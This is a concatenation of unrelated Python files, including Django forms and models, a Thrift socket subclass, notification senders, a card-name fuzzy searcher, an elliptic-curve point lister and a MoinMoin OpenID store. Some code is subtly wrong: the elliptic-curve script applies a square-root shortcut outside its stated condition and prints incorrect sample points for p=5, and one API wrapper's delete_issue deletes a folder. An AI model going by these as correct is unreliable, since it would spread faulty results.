def __init__(self, field_class=DateField, widget=None, **kwargs):
if 'initial' not in kwargs:
kwargs['initial'] = ['', '']
fields = (field_class(), field_class())
super().__init__(fields=fields, widget=DateRangeWidget(), **kwargs)
def compress(self, data_list):
if data_list:
return [
self.fields[0].clean(data_list[0]),
self.fields[1].clean(data_list[1])
]
return None
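# Illustrative usage sketch (not part of the original module): a plain Django
# form exposing a date-range filter built from RangeField. The form and field
# names below are hypothetical examples.
from django.forms import Form
class ExampleDateRangeForm(Form):
    created = RangeField(required=False, label='Created between')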
|
#!/usr/bin/env python
#
# Copyright 2016 Pinterest, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Subclass of TSocket with TCP_NO_DELAY enabled."""
import socket
from thrift.transport.TSocket import TSocket
from thrift.transport.TTransport import TTransportException
class TNoDelaySocket(TSocket):
"""Socket implementation with TCP_NO_DELAY enabled."""
def __init__(self, host='localhost', port=9090, unix_socket=None):
"""Initialize a TNoDelaySocket.
Args:
host: The host to connect to.
port: The port to connect to.
unix_socket: The filename of a unix socket to connect to. In this
case, host and port will be ignored.
"""
TSocket.__init__(self, host=host, port=port, unix_socket=unix_socket)
def open(self):
"""Mostly copied from TSocket.open, with TCP_NODELAY on."""
try:
res0 = self._resolveAddr()
for res in res0:
self.handle = socket.socket(res[0], res[1])
self.handle.settimeout(self._timeout)
# turn on TCP_NODELAY
self.handle.setsockopt(
socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
try:
self.handle.connect(res[4])
except socket.error:
if res is not res0[-1]:
continue
else:
raise
break
except socket.error:
if self._unix_socket:
message = 'Could not connect to socket %s' % self._unix_socket
else:
message = 'Could not connect to %s:%d' % (self.host, self.port)
raise TTransportException(
type=TTransportException.NOT_OPEN, message=message)
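def example_open_transport(host='localhost', port=9090):
    """Illustrative helper (not part of the original module): wraps the
    low-latency socket in the usual buffered transport / binary protocol
    stack. The service client that would consume the protocol is omitted,
    and the host/port values are placeholders."""
    from thrift.transport import TTransport
    from thrift.protocol import TBinaryProtocol
    sock = TNoDelaySocket(host=host, port=port)
    transport = TTransport.TBufferedTransport(sock)
    protocol = TBinaryProtocol.TBinaryProtocol(transport)
    transport.open()  # connects with TCP_NODELAY already enabled
    return transport, protocol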
|
from auditable.models import Auditable
from django.db import models
class ChargerRebates(Auditable):
organization = models.CharField(
blank=True,
null=True,
max_length=250,
unique=False
)
region = models.CharField(
blank=True,
null=True,
max_length=200,
unique=False
)
city = models.CharField(
blank=True,
null=True,
max_length=200,
unique=False
)
address = models.CharField(
blank=True,
null=True,
max_length=200,
unique=False
)
postal_code = models.CharField(
blank=True,
null=True,
max_length=200,
unique=False
)
number_of_fast_charging_stations = models.IntegerField(
blank=True,
null=True
)
in_service_date = models.CharField(
blank=True,
null=True,
max_length=100,
unique=False
)
expected_in_service_date = models.CharField(
blank=True,
null=True,
max_length=200,
unique=False
)
announced = models.CharField(
blank=True,
null=True,
max_length=200,
unique=False
)
rebate_paid = models.DecimalField(
blank=True,
null=True,
max_digits=20,
decimal_places=2
)
notes = models.CharField(
blank=True,
null=True,
max_length=250,
unique=False
)
class Meta:
db_table = "charger_rebates"
|
import os
import toml
from app import CONFIG
poetry_config = toml.load(f'{CONFIG.PROJECT_PATH}{os.path.sep}pyproject.toml')
with open(f'{CONFIG.PROJECT_PATH}{os.path.sep}requirements.txt') as f_stream:
requirements = f_stream.readlines()
all_dependencies = {
**poetry_config['tool']['poetry']['dependencies'],
**poetry_config['tool']['poetry']['dev-dependencies'],
}
all_dependencies = {key.lower(): all_dependencies[key] for key in all_dependencies}
requirements_dict = dict(requirement.replace('\n', '').split('==') for requirement in requirements)
requirements_dict = {key.lower(): requirements_dict[key] for key in requirements_dict}
missing_deps = [
dependency
for dependency in all_dependencies if dependency not in requirements_dict
]
missing_deps = list(filter(lambda dep_name: dep_name not in {'python', 'toml'}, missing_deps))
if missing_deps:
raise RuntimeError(f'Missing dependencies in pip freeze {missing_deps}')
|
import tensorflow as tf
def sigmoid_focal_loss(y_true, y_pred, alpha, gamma):
ce = tf.keras.backend.binary_crossentropy(target=y_true, output=y_pred, from_logits=True)
pred_prob = tf.math.sigmoid(y_pred)
p_t = (y_true * pred_prob) + ((1 - y_true) * (1 - pred_prob))
alpha_factor = y_true * alpha + (1 - y_true) * (1 - alpha)
modulating_factor = tf.math.pow((1.0 - p_t), gamma)
return tf.math.reduce_sum(alpha_factor * modulating_factor * ce, axis=-1)
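if __name__ == '__main__':
    # Illustrative check (not part of the original module): with alpha=0.25 and
    # gamma=2.0 the focal loss for confident correct logits should be much
    # smaller than for confident wrong logits.
    y_true = tf.constant([[1.0, 0.0, 1.0]])
    good_logits = tf.constant([[4.0, -4.0, 4.0]])  # confident and correct
    bad_logits = tf.constant([[-4.0, 4.0, -4.0]])  # confident and wrong
    print(sigmoid_focal_loss(y_true, good_logits, alpha=0.25, gamma=2.0).numpy())
    print(sigmoid_focal_loss(y_true, bad_logits, alpha=0.25, gamma=2.0).numpy())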
|
import json
from rest_framework import serializers
from authentication.models import AppUser
from .models import Note, Notebook
class NoteSerializer(serializers.ModelSerializer):
note_id = serializers.SlugField(source='id', read_only=True, required=False)
title = serializers.JSONField(required=False)
content = serializers.CharField(required=False)
notebook = serializers.PrimaryKeyRelatedField(read_only=True, required=False)
date_modified = serializers.DateField(read_only=True, required=False)
date_created = serializers.DateField(read_only=True, required=False)
def create(self, validated_data):
title = json.dumps(validated_data['title'])
# Workaround to fix a currently unpatched bug in Slate
# that occurs when an editor's contents begin with a list
content = validated_data['content']
if content.startswith('<ul') or content.startswith('<ol'):
content = '<p></p>' + content
response_data = {
'title': title,
'content': content,
'notebook': Notebook.objects.get(id=self.context['request'].data['notebook']),
'user': AppUser.objects.get(email=self.context['request'].data['user']),
}
return Note.objects.create(**response_data)
def update(self, instance, validated_data):
instance.title = json.dumps(validated_data['title'])
# See the above comment in the 'create' method
content = validated_data['content']
if content.startswith('<ul') or content.startswith('<ol'):
content = '<p></p>' + content
instance.content = content
instance.notebook = Notebook.objects.get(id=self.context['request'].data['notebook'])
instance.save()
return instance
class Meta:
model = Note
fields = [ 'note_id', 'title', 'content', 'notebook', 'date_modified', 'date_created' ]
class NotebookSerializer(serializers.ModelSerializer):
notebook_id = serializers.SlugField(source='id', read_only=True, required=False)
name = serializers.CharField(max_length=64, default='')
notes = serializers.PrimaryKeyRelatedField(many=True, read_only=True)
def create(self, validated_data):
return Notebook.objects.create(
user=AppUser.objects.get(email=self.context['request'].data['user']),
**validated_data
)
class Meta:
model = Notebook
fields = [ 'notebook_id', 'name', 'notes', 'date_modified', 'date_created' ]
|
## LANGUAGE: Python
## AUTHOR: Ananda Aguiar
## GITHUB: https://github.com/Anandinha
print("Hello World!!!")
|
# Copyright 2017-2019 EPAM Systems, Inc. (https://www.epam.com/)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from pipeline import PipelineAPI
class CloudPipelineApiProvider(object):
def __init__(self):
self.api = PipelineAPI(os.environ.get('API'), "logs")
def search(self, query, type):
return self.api.search(query, [type])
def create_pipeline(self, name, description):
data = {
"name": name,
"description": description,
}
return self.api.create_pipeline(data)
def delete_pipeline(self, id):
self.api.delete_pipeline(id)
def create_folder(self, name, parent=None):
return self.api.create_folder(name, parent)
def delete_folder(self, id):
self.api.delete_folder(id)
def create_s3_data_storage(self, name, description, parent_folder_id=None, region_id=2, storage_policy=None):
if not storage_policy:
storage_policy = {
"versioningEnabled": True
}
data = {
"name": name,
"path": name,
"description": description,
"type": 'S3',
"shared": False,
"parentFolderId": parent_folder_id,
"regionId": region_id,
"storagePolicy": storage_policy
}
return self.api.datastorage_create(data)
def delete_data_storage(self, id):
self.api.delete_datastorage(id)
def create_issue(self, name, text, entity_id, entity_class):
return self.api.create_issue(name, text, entity_id, entity_class)
def delete_issue(self, id):
self.api.delete_folder(id)
def create_comment(self, issue_id, text):
return self.api.create_comment(issue_id, text)
|
import os.path
import sys
import unittest
if '.' not in sys.path:
sys.path.append('.')
from openmdao.util.testutil import assert_rel_error
from openmdao.main.api import Assembly, set_as_top, Component
from openmdao.main.datatypes.api import Float
from axod_compn import AxodCompn
class temp_data(Component):
""" for assigning new values for axod input """
ttout = Float(518.19,iotype ='out',desc='input temperature',units='degR')
ptout = Float(14.71,iotype ='out',desc='input pressure',units='psi')
    def __init__(self, directory=''):
"""Constructor for temp_data component"""
super(temp_data, self).__init__(directory)
def execute(self):
"""
execute
"""
self._logger.debug('running')
self.ttout = 518.191
self.ptout = 14.711
self._logger.debug('done')
class next_data(Component):
""" for assigning new values from axod output """
hpower = Float(iotype='in',units='hp',desc='input power')
    def __init__(self, directory=''):
        """Constructor for next_data component"""
super(next_data, self).__init__(directory)
self.hpower = 100.0
def execute(self):
"""
execute
"""
self._logger.debug('running')
class TestCase(unittest.TestCase):
""" Test AxodComp. """
def setUp(self):
""" Set up environment before each test. """
pass
def tearDown(self):
""" Clean up environment after each test. """
for filename in ('axod.inp', 'axod.out', 'fort.7', 'pltfile'):
if os.path.exists(filename):
os.remove(filename)
# one_stage input data
def test_one_stage(self):
# inp = 'one_stage.inp'
#comp = set_as_top(AxodCompn(input_filename=inp))
comp = set_as_top(AxodCompn(input_filename='one_stage.inp'))
comp.run()
# 'desired' from Linux, 'tolerance' for Windows.
assert_rel_error(self, comp.hpower, 696.33050537109375, 0.0001)
assert_rel_error(self, comp.tott[0], 430.1795, 0.001)
assert_rel_error(self, comp.totp[0], 7.0516329, 0.0001)
assert_rel_error(self, comp.mflow[0], 7.3931241, 0.0001)
assert_rel_error(self, comp.effs[0], 0.96280003, 0.00001)
assert_rel_error(self, comp.effr[0], 0.92559999, 0.00001)
self.assertEqual(len(comp.results), 3196)
# multi-case multi-stage input data
def test_eee_hpt(self):
# inp = 'eee_hpt.inp'
comp = set_as_top(AxodCompn(input_filename='eee_hpt.inp'))
comp.run()
from platform import architecture
# 'desired' from Linux, 'tolerance' for Windows/Mac.
assert_rel_error(self, comp.hpower, 3323.77880859375, 0.00015)
assert_rel_error(self, comp.tott[0], 757.75458, 0.001)
assert_rel_error(self, comp.totp[0], 8.223134, 0.001)
assert_rel_error(self, comp.mflow[0], 4.9717932, 0.001)
assert_rel_error(self, comp.effs[0], 0.95300001, 0.0001)
assert_rel_error(self, comp.effr[0], 0.90600002, 0.0001)
self.assertEqual(len(comp.results), 19773)
def test_no_input(self):
try:
set_as_top(AxodCompn(input_filename='no-such-file'))
except IOError, exc:
msg = "[Errno 2] No such file or directory: 'no-such-file'"
self.assertEqual(str(exc), msg)
else:
self.fail('Expected IOError')
def test_transdata_input(self):
self.top = set_as_top(Assembly())
self.top.add('tempdata',temp_data())
self.top.add('axodcompn',AxodCompn(input_filename='one_stage.inp'))
self.top.add('nextdata',next_data())
#self.top.driver.workflow.add(['tempdata', 'axodcompn'])
self.top.driver.workflow.add(['tempdata', 'axodcompn', 'nextdata'])
self.top.connect('tempdata.ttout', 'axodcompn.Case1.Stage1.ttin')
self.top.connect('tempdata.ptout', 'axodcompn.Case1.Stage1.ptin')
self.top.connect('axodcompn.hpower', 'nextdata.hpower')
try:
# execute axod with new output file...
self.top.run()
# 'desired' from Linux, 'tolerance' for Windows.
assert_rel_error(self, self.top.axodcompn.hpower, 696.92260742, 0.0001)
assert_rel_error(self, self.top.axodcompn.tott[0], 429.664, 0.001)
assert_rel_error(self, self.top.axodcompn.totp[0], 7.05674, 0.0001)
assert_rel_error(self, self.top.nextdata.hpower, 696.92260742, 0.0001)
except IOError:
print ' problem running code'
# def tearDown(self):
# self.top = None
if __name__ == '__main__':
import nose
sys.argv.append('--cover-package=openmdao')
sys.argv.append('--cover-erase')
nose.runmodule()
|
from gloop.models.remote_player import RemotePlayer
class WebSocketPlayer(RemotePlayer):
def __init__(self, socket):
self.socket = socket
    async def send(self, message: str) -> None:
await self.socket.send_json(message)
async def receive(self) -> str:
return await self.socket.receive_json()
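# Illustrative sketch (not part of the original module): wiring the player to
# an aiohttp websocket handler. The handler name is a hypothetical placeholder
# and the surrounding game loop that would use the player is omitted.
async def example_handler(request):
    from aiohttp import web
    socket = web.WebSocketResponse()
    await socket.prepare(request)
    player = WebSocketPlayer(socket)
    await player.send('welcome')  # serialized via send_json
    # A game loop would now alternate between player.send(...) and player.receive().
    return socket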
|
"""
Copyright © 2021 William L Horvath II
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from typing import Any, Final
from co.deability.identifier import config
from co.deability.identifier.api.repositories.id_repository import (
IdRepository,
IdRepositoryType,
)
from co.deability.identifier.errors.BadRequestError import BadRequestError
from co.deability.identifier.errors.IllegalArgumentError import IllegalArgumentError
WRITER_REPOSITORY: Final[IdRepository] = IdRepository(
repository_type=IdRepositoryType.WRITER
)
def create_new_id(id_repository: IdRepository = WRITER_REPOSITORY) -> dict:
return {"created": id_repository.create_id(retries=config.MAX_WRITE_RETRIES)}
def add_data(
data: dict[str, Any],
identifier: str,
id_repository: IdRepository = WRITER_REPOSITORY,
) -> dict[str, Any]:
if not data:
raise BadRequestError(message="The data is missing or empty.")
id_repository.add_data(data=data, identifier=identifier)
return get_current_data(identifier=identifier)
def get_current_data(identifier: str) -> dict[str, Any]:
data: Any = _get_reader().get_current_data(identifier=identifier)
if not data:
data = {}
return {f"{identifier}": data}
def get_all_data(identifier: str) -> dict[str, Any]:
return {f"{identifier}": _get_reader().get_all_data(identifier=identifier)}
def exists(identifier: str) -> dict:
return {f"{identifier} exists": _get_reader().exists(identifier=identifier)}
def _get_reader() -> IdRepository:
return IdRepository(repository_type=IdRepositoryType.READER)
class IdCreator:
"""
Service class that supports use of a specific IdRepository instance, which must be an
IdRepositoryType.WRITER type.
"""
def __init__(
self,
id_repository: IdRepository = WRITER_REPOSITORY,
):
if not id_repository.get_type() == IdRepositoryType.WRITER:
raise IllegalArgumentError(
message="The supplied repository is not a supported type."
)
self.id_repository = id_repository
def get_new_id(self) -> dict:
return create_new_id(id_repository=self.id_repository)
def add_data(self, data: dict[str, Any], identifier: str) -> dict[str, Any]:
return add_data(
data=data, identifier=identifier, id_repository=self.id_repository
)
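# Illustrative usage sketch (not part of the original module). It assumes the
# identifier repositories are already configured (storage locations, etc.)
# through co.deability.identifier.config, which is outside the scope of this
# service module.
def _example_round_trip() -> dict[str, Any]:
    creator = IdCreator()
    new_id = creator.get_new_id()["created"]
    creator.add_data(data={"label": "example"}, identifier=new_id)
    return get_all_data(identifier=new_id)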
|
"""
Performs Hearthstone card lookup by comparing search queries to card names
"""
import copy
class Searcher:
def __init__(self, card_dict):
"""Initializes a Searcher object with a card dictionary provided
        Args: card_dict(dict): Card dictionary in which cards are separated
            into sub-dictionaries by set and names are stored under the key 'name'
"""
self.card_dict = copy.deepcopy(card_dict)
def change_card_dict(self, card_dict):
"""Replaces the currently used card dictionary with a deep copy of another
        Args: card_dict(dict): Card dictionary in which cards are separated
into sub dictionaries by set and names are located in a key named 'name'
"""
self.card_dict = copy.deepcopy(card_dict)
def find_card(self, query):
"""Finds the best matching card and returns its information
Args: query(string): Search query to use for lookup
Returns:
dict: Card information of best matching card
None: If no suitable matches were found return None
"""
results = self._find_matches(query, 0.5)
if len(results) > 0:
results.sort(key=lambda result: result[1], reverse=True)
return results[0][0]
else:
return None
def _find_matches(self, query, min_match):
"""Finds all cards matching a query and returns them
Args:
query(string): Search query to use for lookup
min_match(number): Minimum value for a card to be matched.
Value can range from 0 to 1.
Returns:
            list: Unsorted list of [card, match_percent] pairs
"""
result_list = []
l_query = query.lower()
        #The card dictionary's main keys are the sets the cards belong to
for exp in self.card_dict:
for card in self.card_dict[exp]:
#Change all uppercase letters to lowercase in preparation for string comparisons
l_cardname = card['name'].lower()
percent_match = 0
search_words = {}
#Create a sub dictionary for each search word in the query
for word in l_query.split(' '):
search_words.update({word : {}})
card_words = l_cardname.split(' ')
#Calculate the match percentage between every search word and every card word
for search_word in search_words:
for card_word in card_words:
match = 1 - (Searcher.levenshtein_distance(search_word, card_word) /
max(len(search_word), len(card_word)))
if search_word not in search_words.keys():
search_words[search_word] = {card_word: { 'match' : match } }
else:
search_words[search_word].update( {card_word: { 'match' : match } } )
                #Calculates the total match percentage for the entire query and the card name
for search_word in search_words:
max_value_key = list(search_words[search_word].keys())[0]
max_value = search_words[search_word][max_value_key]
for card_word in search_words[search_word]:
if search_words[search_word][card_word]['match'] > max_value['match']:
max_value_key = card_word
max_value = search_words[search_word][card_word]
percent_card_match = len(max_value_key) / len(l_cardname.replace(" ", ""))
percent_query_match = len(search_word) / len(l_query.replace(" ", ""))
                    #These weights emphasize matching the query more than the entire card
card_match_weight = 0.25
query_match_weight = 1 - card_match_weight
percent_match += (percent_query_match * max_value['match'] * query_match_weight +
percent_card_match * max_value['match'] * card_match_weight)
if percent_match >= min_match:
result_list.append([card, percent_match])
return result_list
    @staticmethod
    def levenshtein_distance(s1, s2):
"""Levenshtein Distance Algorithm taken from Wikibooks
Args:
s1(string): First string for comparisons
s2(string): Second string for comparisons
Returns:
int: The levenshtein distance between two strings
"""
if len(s1) < len(s2):
return Searcher.levenshtein_distance(s2, s1)
# len(s1) >= len(s2)
if len(s2) == 0:
return len(s1)
previous_row = range(len(s2) + 1)
for i, c1 in enumerate(s1):
current_row = [i + 1]
for j, c2 in enumerate(s2):
insertions = previous_row[j + 1] + 1 # j+1 instead of j since previous_row and current_row are one character longer
deletions = current_row[j] + 1 # than s2
substitutions = previous_row[j] + (c1 != c2)
current_row.append(min(insertions, deletions, substitutions))
previous_row = current_row
return previous_row[-1]
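if __name__ == '__main__':
    # Minimal demonstration with illustrative card data (not a real card set);
    # the closest fuzzy match for the query below should be the 'Fireball' entry.
    demo_cards = {
        'Classic': [
            {'name': 'Fireball'},
            {'name': 'Frostbolt'},
        ]
    }
    searcher = Searcher(demo_cards)
    print(searcher.find_card('fire ball'))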
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
import urllib2
import json
from pushbullet import Pushbullet
import profile
def sendNotification_Pushetta(message):
data = {
"body" : message,
"message_type" : "text/plain"
}
req = urllib2.Request('http://api.pushetta.com/api/pushes/{0}/'.format(profile.pushetta_channel))
req.add_header('Content-Type', 'application/json')
req.add_header('Authorization', 'Token {0}'.format(profile.pushetta_api))
response = urllib2.urlopen(req, json.dumps(data))
def sendNotification_Pushbullet(message):
pb = Pushbullet(profile.pushbullet_api)
push = pb.push_note("VAOS", message)
def sendNotification(message):
if profile.notification_service == "PUSHBULLET":
sendNotification_Pushbullet(message)
elif profile.notification_service == "PUSHETTA":
sendNotification_Pushetta(message)
|
"""
Placeholders
"""
# You're writing a program, and you don't know what your starting value for your 'initial' variable is yet. The program won't run if you leave it blank, but you don't want to forget you need it! Make a workaround.
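# One possible workaround (illustrative): assign a sentinel such as None (or the
# Ellipsis literal ...) as a placeholder, then fail loudly if it is still unset
# when the real value is finally needed.
initial = None  # TODO: decide on the real starting value
def use_initial():
    if initial is None:
        raise ValueError("'initial' is still a placeholder -- set it before use")
    return initial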
|
class default_values:
def __init__(self):
pass
    @staticmethod
    def default_equation():
        return "3x-4x^2+1=1"
|
from typing import NamedTuple, List, Optional, Dict, Any
import numpy as np
import torch
from torch import nn as nn
from dpu_utils.ptutils import BaseComponent
class SampleDatapoint(NamedTuple):
input_features: List[float]
target_class: bool
class TensorizedDatapoint(NamedTuple):
input_features: np.ndarray
target_class: np.ndarray
class SimpleRegression(BaseComponent[SampleDatapoint, TensorizedDatapoint]):
"""A simple linear regression model used for testing."""
def __init__(self, name, num_features: int, hyperparameters: Optional[Dict[str, Any]] = None):
super(SimpleRegression, self).__init__(name, hyperparameters)
self.__num_features = num_features
@classmethod
def default_hyperparameters(cls) -> Dict[str, Any]:
return {}
def _load_metadata_from_sample(self, data_to_load: SampleDatapoint) -> None:
pass # No metadata in this simple model.
def _finalize_component_metadata_and_model(self) -> None:
self.__layer = nn.Linear(self.__num_features, 1, bias=False)
self.__bias = nn.Parameter(torch.tensor(0, dtype=torch.float32)) # Use a separate bias to allow freezing the weights.
self.__loss = nn.BCEWithLogitsLoss()
def load_data_from_sample(self, data_to_load: SampleDatapoint) -> Optional[TensorizedDatapoint]:
return TensorizedDatapoint(
input_features=np.array(data_to_load.input_features, dtype=np.float32),
target_class=np.array(1 if data_to_load.target_class else 0, dtype=np.float32)
)
def initialize_minibatch(self) -> Dict[str, Any]:
return {
'inputs': [],
'targets': []
}
def extend_minibatch_by_sample(self, datapoint: TensorizedDatapoint, accumulated_minibatch_data: Dict[str, Any]) -> bool:
accumulated_minibatch_data['inputs'].append(datapoint.input_features)
accumulated_minibatch_data['targets'].append(datapoint.target_class)
return True
def finalize_minibatch(self, accumulated_minibatch_data: Dict[str, Any]) -> Dict[str, Any]:
return {
'inputs': torch.tensor(np.stack(accumulated_minibatch_data['inputs'], axis=0), device=self.device),
'targets': torch.tensor(np.stack(accumulated_minibatch_data['targets'], axis=0), device=self.device)
}
def predict(self, inputs: torch.Tensor):
predicted = self.__layer(inputs)[:, 0] + self.__bias # B
return predicted >= 0
def forward(self, inputs, targets):
predicted = self.__layer(inputs)[:, 0] + self.__bias # B
loss = self.__loss(input=predicted, target=targets)
return loss
|
# -*- coding: utf-8 -*-
# https://tex2e.github.io/blog/crypto/point-of-elliptic-curve-over-GF
def quadratic_residue(a, p):
return pow(a, (p - 1) // 2, p) == 1
def f(x, a, b, p):
return (x**3 + a*x + b) % p
def calc_y(z, p):
    # modular square root of z; this closed form is only valid when p % 4 == 3
    res = pow(z, (p + 1) // 4, p)
    return res % p, -res % p
def disply_points(a, b, p):
points = []
for x in range(p):
z = f(x, a, b, p)
if quadratic_residue(z, p):
y1, y2 = calc_y(z, p)
print('x = %2d, z = %d, quadratic_residue(%2d, %d)? = True, y = %d, %d' % (x, z, x, p, y1, y2))
points.append((x, y1))
points.append((x, y2))
else:
print('x = %2d, z = %d, quadratic_residue(%2d, %d)? = False' % (x, z, x, p))
print("points:")
print(sorted(points))
print(len(points))
p = 31
disply_points(2, 17, p)
# x = 0, z = 17, quadratic_residue( 0, 31)? = False
# x = 1, z = 20, quadratic_residue( 1, 31)? = True, y = 2, 29
# x = 2, z = 29, quadratic_residue( 2, 31)? = False
# x = 3, z = 19, quadratic_residue( 3, 31)? = True, y = 8, 23
# x = 4, z = 27, quadratic_residue( 4, 31)? = False
# x = 5, z = 28, quadratic_residue( 5, 31)? = True, y = 4, 27
# x = 6, z = 28, quadratic_residue( 6, 31)? = True, y = 4, 27
# x = 7, z = 2, quadratic_residue( 7, 31)? = True, y = 8, 23
# x = 8, z = 18, quadratic_residue( 8, 31)? = True, y = 4, 27
# x = 9, z = 20, quadratic_residue( 9, 31)? = True, y = 2, 29
# x = 10, z = 14, quadratic_residue(10, 31)? = True, y = 16, 15
# x = 11, z = 6, quadratic_residue(11, 31)? = False
# x = 12, z = 2, quadratic_residue(12, 31)? = True, y = 8, 23
# x = 13, z = 8, quadratic_residue(13, 31)? = True, y = 16, 15
# x = 14, z = 30, quadratic_residue(14, 31)? = False
# x = 15, z = 12, quadratic_residue(15, 31)? = False
# x = 16, z = 22, quadratic_residue(16, 31)? = False
# x = 17, z = 4, quadratic_residue(17, 31)? = True, y = 2, 29
# x = 18, z = 26, quadratic_residue(18, 31)? = False
# x = 19, z = 1, quadratic_residue(19, 31)? = True, y = 1, 30
# x = 20, z = 28, quadratic_residue(20, 31)? = True, y = 4, 27
# x = 21, z = 20, quadratic_residue(21, 31)? = True, y = 2, 29
# x = 22, z = 14, quadratic_residue(22, 31)? = True, y = 16, 15
# x = 23, z = 16, quadratic_residue(23, 31)? = True, y = 4, 27
# x = 24, z = 1, quadratic_residue(24, 31)? = True, y = 1, 30
# x = 25, z = 6, quadratic_residue(25, 31)? = False
# x = 26, z = 6, quadratic_residue(26, 31)? = False
# x = 27, z = 7, quadratic_residue(27, 31)? = True, y = 2, 29
# x = 28, z = 15, quadratic_residue(28, 31)? = False
# x = 29, z = 5, quadratic_residue(29, 31)? = True, y = 1, 30
# x = 30, z = 14, quadratic_residue(30, 31)? = True, y = 16, 15
# points:
# [(1, 2), (1, 29), (3, 8), (3, 23), (5, 4), (5, 27), (6, 4), (6, 27), (7, 8), (7, 23), (8, 4), (8, 27), (9, 2), (9, 29), (10, 15), (10, 16), (12, 8), (12, 23), (13, 15), (13, 16), (17, 2), (17, 29), (19, 1), (19, 30), (20, 4), (20, 27), (21, 2), (21, 29), (22, 15), (22, 16), (23, 4), (23, 27), (24, 1), (24, 30), (27, 2), (27, 29), (29, 1), (29, 30), (30, 15), (30, 16)]
# 40
p = 5
disply_points(1, 1, p)
# x = 0, z = 1, quadratic_residue( 0, 5)? = True, y = 1, 4
# x = 1, z = 3, quadratic_residue( 1, 5)? = False
# x = 2, z = 1, quadratic_residue( 2, 5)? = True, y = 1, 4
# x = 3, z = 1, quadratic_residue( 3, 5)? = True, y = 1, 4
# x = 4, z = 4, quadratic_residue( 4, 5)? = True, y = 4, 1
# points:
# [(0, 1), (0, 4), (2, 1), (2, 4), (3, 1), (3, 4), (4, 1), (4, 4)]
# 8
p = 11
disply_points(1, 6, p)
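# A small verification helper (illustrative): a point (x, y) lies on the curve
# y^2 = x^3 + a*x + b over GF(p) exactly when both sides agree modulo p.
def is_on_curve(x, y, a, b, p):
    return (y * y - f(x, a, b, p)) % p == 0
print(is_on_curve(19, 1, 2, 17, 31))  # (19, 1) is on y^2 = x^3 + 2x + 17 over GF(31) -> True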
|
"""
MoinMoin - OpenID utils
@copyright: 2006, 2007 Johannes Berg <johannes@sipsolutions.net>
@license: GNU GPL, see COPYING for details.
"""
from random import randint
import time
from openid import oidutil
from openid.store.interface import OpenIDStore
from openid.association import Association
from openid.store import nonce
from MoinMoin import caching
from MoinMoin.support.python_compatibility import hash_new
from MoinMoin import log
logging = log.getLogger(__name__)
# redirect openid logging to moin log
def log(msg, level=0):
logging.log(level, msg)
oidutil.log = log
def strbase64(value):
from base64 import encodestring
return encodestring(str(value)).replace('\n', '')
def _cleanup_nonces(request):
cachelist = caching.get_cache_list(request, 'openid-nonce', 'farm')
# really openid should have a method to check this...
texpired = time.time() - nonce.SKEW
for name in cachelist:
entry = caching.CacheEntry(request, 'openid-nonce', name,
scope='farm', use_pickle=False)
try:
timestamp = int(entry.content())
if timestamp < texpired:
entry.remove()
except caching.CacheError:
pass
class MoinOpenIDStore(OpenIDStore):
'''OpenIDStore for MoinMoin'''
def __init__(self, request):
self.request = request
OpenIDStore.__init__(self)
def key(self, url):
'''return cache key'''
return hash_new('sha1', url).hexdigest()
def storeAssociation(self, server_url, association):
ce = caching.CacheEntry(self.request, 'openid', self.key(server_url),
scope='wiki', use_pickle=True)
if ce.exists():
assocs = ce.content()
else:
assocs = []
assocs += [association.serialize()]
ce.update(assocs)
def getAssociation(self, server_url, handle=None):
ce = caching.CacheEntry(self.request, 'openid', self.key(server_url),
scope='wiki', use_pickle=True)
if not ce.exists():
return None
assocs = ce.content()
found = False
for idx in xrange(len(assocs)-1, -1, -1):
assoc_str = assocs[idx]
association = Association.deserialize(assoc_str)
if association.getExpiresIn() == 0:
del assocs[idx]
else:
if handle is None or association.handle == handle:
found = True
break
ce.update(assocs)
if found:
return association
return None
def removeAssociation(self, server_url, handle):
ce = caching.CacheEntry(self.request, 'openid', self.key(server_url),
scope='wiki', use_pickle=True)
if not ce.exists():
return
assocs = ce.content()
for idx in xrange(len(assocs)-1, -1, -1):
assoc_str = assocs[idx]
association = Association.deserialize(assoc_str)
if association.handle == handle:
del assocs[idx]
if len(assocs):
ce.update(assocs)
else:
ce.remove()
def useNonce(self, server_url, timestamp, salt):
val = ''.join([str(server_url), str(timestamp), str(salt)])
csum = hash_new('sha1', val).hexdigest()
ce = caching.CacheEntry(self.request, 'openid-nonce', csum,
scope='farm', use_pickle=False)
if ce.exists():
# nonce already used!
return False
ce.update(str(timestamp))
if randint(0, 999) == 0:
self.request.add_finisher(_cleanup_nonces)
return True
|
# This file is part of the bapsflib package, a Python toolkit for the
# BaPSF group at UCLA.
#
# http://plasma.physics.ucla.edu/
#
# Copyright 2017-2018 Erik T. Everson and contributors
#
# License: Standard 3-clause BSD; see "LICENSES/LICENSE.txt" for full
# license terms and contributor agreement.
"""
Module for the N5700PS power supply mapper
`~bapsflib._hdf.maps.controls.n5700ps.HDFMapControlN5700PS`.
"""
__all__ = ["HDFMapControlN5700PS"]
import h5py
import numpy as np
import warnings
from warnings import warn
from bapsflib.utils import _bytes_to_str
from bapsflib.utils.exceptions import HDFMappingError
from .templates import HDFMapControlCLTemplate
from .types import ConType
class HDFMapControlN5700PS(HDFMapControlCLTemplate):
"""
Mapping module for control device 'N5700_PS'.
Simple group structure looks like:
.. code-block:: none
+-- N5700_PS
| +-- Run time list
| +-- nsconf_<descr>
| | +--
"""
def __init__(self, group: h5py.Group):
"""
:param group: the HDF5 control device group
"""
